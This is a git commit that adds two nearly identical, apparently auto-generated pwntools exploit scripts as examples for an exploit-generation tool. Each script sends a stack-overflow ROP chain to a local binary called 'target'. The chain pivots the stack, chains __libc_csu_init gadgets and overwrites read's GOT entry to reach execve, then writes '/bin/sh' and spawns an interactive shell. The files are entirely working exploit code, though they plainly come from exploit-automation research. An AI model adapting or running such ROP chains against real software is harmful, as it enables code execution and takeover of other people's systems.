examples: added generated exploit scripts

aesophor · aesophor · commit d5a1b8a630aa · 2022-02-05T23:31:37.000+08:00
我好像有點強

Signed-off-by: Marco Wang &lt;m.aesophor@gmail.com&gt;
diff --git a/examples/readme-alt/exploit_0.py b/examples/readme-alt/exploit_0.py
@@ -0,0 +1,170 @@
+#!/usr/bin/env python3
+from pwn import *
+context.update(arch = 'amd64', os = 'linux', log_level = 'info')
+
+elf = ELF('target', checksec=False)
+__libc_csu_init = 0x401150
+__libc_csu_init_call_target = 0x403e38
+__libc_csu_init_gadget1 = 0x4011a6
+__libc_csu_init_gadget2 = 0x401190
+canary = 0x0
+elf_base = 0x0
+pivot_dest = 0x404830
+pop_rsi_pop_r15_ret = 0x4011b1
+
+if __name__ == '__main__':
+    proc = elf.process()
+
+    # input state (offset = 80), skipped
+
+    # input state (offset = 80), skipped
+
+    # input state (offset = 80)
+    # input state (rop chain begin)
+    payload  = b'\x00\x00\x00\x00\x00\x00\x00\x00\x30\x48\x40\x00\x00\x00\x00\x00\x2e\x11\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x48\x40\x00\x00\x00\x00\x00\x2e\x11\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'[:160]
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x1)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x2)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x3)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x4)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x5)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x6)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(0x0)
+    payload += p64(elf_base + pivot_dest + 0x30 * 0x7)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(0x400)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(0x4141414141414141)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.got['read'])
+    payload += p64(0x1)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(0x1)
+    payload += p64(0x0)
+    payload += p64(0x0)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.bss())
+    payload += p64(0x3b)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(elf_base + elf.bss())
+    payload += p64(0x0)
+    payload += p64(0x0)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = b'\x40'
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = b'\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
+    proc.send(payload)
+    time.sleep(0.2)
+
+    proc.interactive()
diff --git a/examples/readme/exploit_0.py b/examples/readme/exploit_0.py
@@ -0,0 +1,170 @@
+#!/usr/bin/env python3
+from pwn import *
+context.update(arch = 'amd64', os = 'linux', log_level = 'info')
+
+elf = ELF('target', checksec=False)
+__libc_csu_init = 0x401150
+__libc_csu_init_call_target = 0x403e38
+__libc_csu_init_gadget1 = 0x4011a6
+__libc_csu_init_gadget2 = 0x401190
+canary = 0x0
+elf_base = 0x0
+pivot_dest = 0x404830
+pop_rsi_pop_r15_ret = 0x4011b1
+
+if __name__ == '__main__':
+    proc = elf.process()
+
+    # input state (offset = 48), skipped
+
+    # input state (offset = 48), skipped
+
+    # input state (offset = 48)
+    # input state (rop chain begin)
+    payload  = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x48\x40\x00\x00\x00\x00\x00\x2e\x11\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x58\x48\x40\x00\x00\x00\x00\x00\x2e\x11\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'[:96]
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x1)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x2)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x3)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x4)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x5)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + pop_rsi_pop_r15_ret)
+    payload += p64(elf_base + pivot_dest + 0x8 + 0x30 * 0x6)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.sym['read'])
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(0x0)
+    payload += p64(elf_base + pivot_dest + 0x30 * 0x7)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(0x400)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(0x4141414141414141)
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.got['read'])
+    payload += p64(0x1)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(0x1)
+    payload += p64(0x0)
+    payload += p64(0x0)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(0x0)
+    payload += p64(elf_base + elf.bss())
+    payload += p64(0x3b)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    payload += p64(elf_base + __libc_csu_init_gadget1)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x0)
+    payload += p64(0x1)
+    payload += p64(elf_base + elf.bss())
+    payload += p64(0x0)
+    payload += p64(0x0)
+    payload += p64(elf_base + __libc_csu_init_call_target)
+    payload += p64(elf_base + __libc_csu_init_gadget2)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(0x4141414141414141)
+    payload += p64(elf_base + elf.sym['read'])
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = b'\x40'
+    proc.send(payload)
+    time.sleep(0.2)
+
+    payload  = b'\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
+    proc.send(payload)
+    time.sleep(0.2)
+
+    proc.interactive()
